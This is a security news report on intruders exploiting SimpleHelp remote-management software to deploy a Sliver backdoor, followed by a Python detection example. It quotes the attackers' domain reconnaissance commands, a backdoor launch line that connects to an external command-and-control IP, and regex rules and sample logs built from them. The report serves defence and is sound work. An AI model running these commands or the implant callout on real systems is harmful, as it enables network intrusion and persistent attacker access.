
Cybersecurity firm Field Effect has identified and thwarted a sophisticated cyberattack that leveraged newly discovered vulnerabilities in SimpleHelp’s Remote Monitoring and Management (RMM) software. Threat actors exploited these flaws to infiltrate target networks, establish persistent access, and deploy the Sliver backdoor, a post-exploitation framework frequently used for red teaming but increasingly abused by cybercriminals.
According to Field Effect, “the attack involved the quick and deliberate execution of several post-compromise tactics, techniques and procedures (TTPs) including network and system discovery, administrator account creation, and the establishment of persistence mechanisms, which could have led to the deployment of ransomware had Field Effect MDR not prevented the attack.”
The attack commenced when a threat actor gained entry via a compromised SimpleHelp RMM client known as JWrapper-Remote Access. The malicious connection originated from IP address 194.76.227[.]171, located in Estonia, which was hosting a SimpleHelp server on port 80, as identified through Shodan scans. However, due to minimal detection rates across security vendors, this connection likely evaded standard network security filters.
Upon gaining access, the adversary executed a series of reconnaissance commands to enumerate system information, user accounts, and network structures. The following commands were observed:
- ipconfig /all (Network configuration details)
- net group "domain admins" /domain (Listing domain administrators)
- nltest /dclist: (Enumerating domain controllers)
- tasklist (Listing running processes)
- net share and net use (Enumerating shared network resources)

After reconnaissance, the attackers escalated privileges by creating a new administrator account, dubbed “sqladmin.” They then installed a malicious agent.exe binary to serve as a persistence mechanism, in case RMM access was lost.
Field Effect’s analysis of agent.exe revealed that it was consistent with the Sliver post-exploitation framework, an advanced Go-based C2 (command-and-control) tool comparable to Cobalt Strike and Metasploit. The binary exhibited process injection, service tampering, and file system manipulation capabilities—all hallmarks of Sliver-based intrusions.
“The backdoor was configured to connect to the IP address 45.9.148[.]136 on port 443 via the following command: agent.exe -connect 45.9.148[.]136:443 -ignore-cert,” Field Effect reported.
This C2 infrastructure, hosted in the Netherlands, was found to be running OpenSSH, AnyDesk, and additional remote access services, making it a robust launching pad for further malicious activities.
Once inside the environment, the attackers targeted the domain controller (DC) and re-established RMM access to execute the same set of reconnaissance commands. However, instead of deploying agent.exe, they opted for a Cloudflare tunnel masquerading as Windows svchost.exe, effectively bypassing firewall restrictions and concealing traffic from security tools.
According to Field Effect, “attempted tunnel execution was blocked by the Field Effect MDR endpoint agent, following which the system was also isolated from the network.” Had the activity gone undetected, this tunnel could have facilitated further malware deployment, potentially leading to ransomware attacks.
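The reconnaissance sequence listed above, the agent.exe launch line and the svchost.exe masquerade are the host artifacts a defender can alert on. The following is an added example, not Field Effect's or SimpleHelp's code, that runs three such rules over constructed process-creation records (hostnames, paths and timestamps are assumed): a burst of distinct discovery commands from one parent within a short window, the reported implant command line, and a svchost.exe running outside the Windows system directories.

```python
import re
from datetime import datetime, timedelta

# Discovery commands reported in the intrusion, keyed by category so the rule
# counts distinct techniques rather than repeated runs of the same command.
DISCOVERY = {
    "net_config": re.compile(r"^ipconfig(\.exe)?\s+/all", re.I),
    "domain_admins": re.compile(r'^net(\.exe)?\s+group\s+"domain admins"\s+/domain', re.I),
    "dc_enum": re.compile(r"^nltest(\.exe)?\s+/dclist:", re.I),
    "proc_list": re.compile(r"^tasklist(\.exe)?\b", re.I),
    "shares": re.compile(r"^net(\.exe)?\s+(share|use)\b", re.I),
}
# The reported Sliver launch line; -ignore-cert disables TLS certificate checks.
IMPLANT = re.compile(r"agent\.exe\s+-connect\s+\S+:\d+\s+-ignore-cert", re.I)
# A genuine svchost.exe only runs from these directories.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

def detect(events, window=timedelta(minutes=5), min_categories=3):
    """events: time-ordered (iso_time, host, parent_image, image_path, cmdline)
    tuples. Returns a list of (host, rule, detail) alerts."""
    alerts, recent = [], {}  # recent: (host, parent) -> [(time, category)]
    for ts, host, parent, image, cmdline in events:
        t, img = datetime.fromisoformat(ts), image.lower()
        if IMPLANT.search(cmdline):
            alerts.append((host, "sliver_implant_launch", cmdline))
        if img.endswith("\\svchost.exe") and not img.startswith(SYSTEM_DIRS):
            alerts.append((host, "svchost_masquerade", image))
        for cat, rx in DISCOVERY.items():
            if rx.search(cmdline):
                key = (host, parent)
                hist = [(t0, c) for t0, c in recent.get(key, []) if t - t0 <= window]
                hist.append((t, cat))
                recent[key] = hist
                cats = {c for _, c in hist}
                if len(cats) == min_categories:  # fire once, when the threshold is crossed
                    alerts.append((host, "discovery_burst", f"{parent}: {sorted(cats)}"))
    return alerts

# Constructed sample of process-creation records (illustrative, not incident logs):
# (timestamp, host, parent image, image path, command line).
SAMPLE = [
    ("2025-02-03T10:00:01", "WS01", "JWrapper-Remote Access.exe", r"C:\Windows\System32\ipconfig.exe", "ipconfig /all"),
    ("2025-02-03T10:00:09", "WS01", "JWrapper-Remote Access.exe", r"C:\Windows\System32\net.exe", 'net group "domain admins" /domain'),
    ("2025-02-03T10:00:15", "WS01", "JWrapper-Remote Access.exe", r"C:\Windows\System32\nltest.exe", "nltest /dclist:corp.example"),
    ("2025-02-03T10:00:21", "WS01", "JWrapper-Remote Access.exe", r"C:\Windows\System32\tasklist.exe", "tasklist"),
    ("2025-02-03T10:03:00", "WS01", "cmd.exe", r"C:\Users\Public\agent.exe", "agent.exe -connect 45.9.148.136:443 -ignore-cert"),
    ("2025-02-03T11:00:00", "DC01", "JWrapper-Remote Access.exe", r"C:\ProgramData\svchost.exe", "svchost.exe"),
    ("2025-02-03T11:00:05", "DC01", "services.exe", r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
    ("2025-02-03T12:00:00", "WS02", "explorer.exe", r"C:\Windows\System32\ipconfig.exe", "ipconfig /all"),
]
```

Calling detect(SAMPLE) yields one discovery_burst alert for WS01 (raised on the third distinct command, not on every later one), the implant launch, and the svchost.exe masquerade on DC01, while the lone ipconfig on WS02 and the legitimate svchost.exe stay silent.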
While no definitive attribution has been made, Field Effect noted that similar tactics were previously observed in campaigns linked to the Akira Ransomware group. However, given the common TTPs, multiple threat actors could be leveraging SimpleHelp vulnerabilities for their own objectives.
Field Effect also confirmed that an earlier January 28 attack, initially suspected to be SimpleHelp-related, was indeed caused by the same RMM exploitation vector. Analysis of the SimpleHelp server configuration revealed that it had been modified to accept connections from a malicious SimpleHelp instance hosted on a Russian IP (213.183.45[.]230).